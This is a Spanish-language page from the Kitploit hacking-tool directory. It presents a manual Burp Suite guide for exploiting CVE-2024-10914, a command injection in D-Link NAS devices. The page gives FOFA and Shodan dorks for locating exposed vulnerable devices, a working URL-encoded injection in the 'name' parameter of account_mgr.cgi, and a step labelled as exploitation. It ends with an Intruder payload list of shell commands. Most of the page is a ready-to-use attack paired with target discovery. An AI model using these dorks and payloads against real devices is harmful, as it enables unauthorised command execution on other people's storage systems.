Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-10914 — CVE-2024-10914_Pruebas manuales con burpsuite | Kitploit
Herramientas/GitHubGitHub/egi08/cve-2024-10914
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónComando y Control
GitHubegi08/cve-2024-10914

CVE-2024-10914

CVE-2024-10914_Pruebas manuales con burpsuite

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-10914 Prueba de Vulnerabilidad de Inyección de Comandos para D-Link NAS_Manual testing with burpsuite


Dork para encontrar dispositivos vulnerables

Utilice el siguiente dork de búsqueda para encontrar dispositivos D-Link NAS potencialmente vulnerables:

root@kitploit:~

FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 

Esta cadena de búsqueda ayuda a identificar dispositivos que ejecutan la aplicación vulnerable D-Link DNS ShareCenter con la versión específica del servidor Lighttpd que está afectada por la vulnerabilidad.


Esta guía proporciona instrucciones paso a paso sobre cómo probar manualmente una Vulnerabilidad de Inyección de Comandos (CVE-2024-10914) en el parámetro name de D-Link NAS utilizando Burp Suite. URL objetivo: http://Target.

Requisitos previos

  • Burp Suite
  • Un navegador web configurado para usar Burp Suite como proxy (normalmente configurado a 127.0.0.1:8080)
Descargar herramienta

Paso 1: Configurar Burp Suite

  1. Iniciar Burp Suite: Inicie Burp Suite en su máquina.
  2. Configurar proxy: Asegúrese de que su navegador esté configurado para usar Burp Suite como proxy estableciendo la configuración de proxy del navegador en 127.0.0.1 en el puerto 8080.

Paso 2: Interceptar la solicitud

  1. Navegar al objetivo: En su navegador, vaya a http://Target.
  2. Habilitar Intercept: En Burp Suite, habilite la función de interceptación para capturar la solicitud saliente.

Paso 3: Modificar la solicitud

  1. Localizar el parámetro vulnerable: En la solicitud interceptada, encuentre el parámetro name en la URL. Debería aparecer como:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
    
  2. Inyectar un comando de prueba: Modifique el parámetro name para incluir un comando de prueba como echo "test":

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
    
  3. Enviar la solicitud modificada: Reenvíe la solicitud modificada al servidor.


Paso 4: Analizar la respuesta

  1. Verificar la respuesta: Busque la salida del comando inyectado en la respuesta. Por ejemplo, si el servidor ejecutó echo "test", debería ver:

    root@kitploit:~
    test
    

Paso 5: Explotar la vulnerabilidad

  1. Inyectar un comando malicioso: Si la prueba es exitosa, intente comandos más sofisticados, como:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
    
  2. Enviar la solicitud de explotación: Reenvíe esta solicitud al servidor.

  3. Analizar la respuesta: Verifique si la salida del comando (por ejemplo, información del ID de usuario) está presente en la respuesta.


Paso 6: Automatizar con extensiones de Burp Suite (Opcional)

  1. Usar Intruder: Automatice las pruebas con la herramienta Intruder de Burp Suite.

    • Haga clic derecho en la solicitud y seleccione Enviar a Intruder.
    • Establezca el parámetro name como la posición de carga útil.
    • Use una lista de comandos como cargas útiles para las pruebas.
  2. Cargas útiles de ejemplo:

    root@kitploit:~
    echo "test"
    id
    uname -a
    ls /etc
    
  3. Iniciar Intruder: Ejecute el ataque Intruder para probar múltiples cargas útiles automáticamente.